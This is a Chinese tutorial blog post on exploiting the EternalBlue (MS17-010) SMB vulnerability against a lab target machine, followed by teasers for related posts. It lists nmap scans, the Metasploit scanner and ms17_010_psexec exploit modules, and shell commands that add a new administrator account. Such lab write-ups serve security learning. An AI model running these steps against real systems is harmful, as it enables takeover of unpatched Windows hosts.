摘要:永恒之蓝漏洞利用漏洞介绍什么是永恒之蓝漏洞恶意代码利用系统的漏洞可以获取系统最高权限。师傅们扫描开放文件及打印机共享端口的服务器,对该漏洞进行利用后无需用户任何操作,只要开机上网,即可向目标靶机植入远程控制木马,恶意插件等。
0x01 漏洞介绍
什么是永恒之蓝漏洞:恶意代码利用Windows系统的SMB漏洞可以获取系统最高权限。师傅们扫描开放445(文件及打印机共享)端口的Windows服务器,对该漏洞进行利用后无需用户任何操作,只要开机上网,即可向目标靶机植入远程控制木马,恶意插件等。哎呀其实就是那个不要脸的勒索病毒原型。
0x02 端口扫描
使用nmap对靶机进行端口扫描探测445端口是否开启:nmap -sS 靶机IP
0x03 漏洞扫描
思路一:nmap脚本定点扫描:nmap --script=smb-vuln-ms17-010 靶机IP
思路二:msf脚本定点扫描:1.use auxiliary/scanner/smb/smb_ms17_010;
2.set RHOST 靶机IP;
3. set THREADS 10(整快点);
4.exploit;
注:关了你那个防火墙
扫出来有漏洞就是这样的:
0x04 漏洞攻击
使用msf中现成的exp攻击即可:
1.use exploit/windows/smb/ms17_010_psexec;
2.show options;
3.set RHOSTS 靶机IP;
4.exoloit冲;
注:别忘把网络整明白儿的
成功之后是这样的:
0x05 提权
使用在内存中混淆的shell ,meterpreter进行新建用户并提权操作:
1.shell;
2.whoami;
3.net user zmy zmy /add;
4.net localgroup Administrators zmy /add;
成功穿上小马甲,提权成功可使用新建的用户进行后续操作了:
后续?后续就没了自己慢慢悟吧,拿key闪人:)
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/119337.html
摘要:利用永恒之蓝对进行攻击环境搭建,其中为靶机。命令有很多,想使用什么命令可以百度,我这里使用一些进行演示的命令就可以了。一般权限不够命令无法执行,这里简单介绍提权,提权方法百度多的很。至此本次利用永恒之蓝攻击漏洞拿到权限结束。 ...
摘要:永恒之蓝漏洞利用与复现首先需要准备的环境做为靶机获取信息利用扫描得到靶机得到然后利用得到靶机信息发现可能利用的漏洞然后启动然后查找漏洞路径使用进行攻击然后输入然后在查看当前用户发现用乱码可以用这 ...
摘要:使用与进行内网横向移动目标系统为跳板主机为一,使用探测内网,将目标上线至,使用探测内网信息查看当前目标系统网络情况,确认目标系统所在内网网段,使用的功能对内网进行扫描可以看到目标开放了端口二,内网横向移动对当前目标系 ...
摘要:二永恒之蓝基于的漏洞,和最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受蠕虫型攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。 445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 ...
摘要:它本身附带数多个已知软件漏洞的专业级漏洞攻击工具。流行的攻击技术包括缓冲区溢出应用程序漏洞攻击,以及利用配置错误等。或是应用在的一种可以防止缓冲区溢出的技术。 一、MSF介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framewo...
阅读 1119·2021-11-22 09:34
阅读 2965·2021-11-10 11:36
阅读 2971·2021-10-13 09:40
阅读 5010·2021-09-26 09:46
阅读 771·2021-09-07 09:58
阅读 468·2019-08-30 15:55
阅读 1314·2019-08-30 15:53
阅读 1444·2019-08-29 13:55
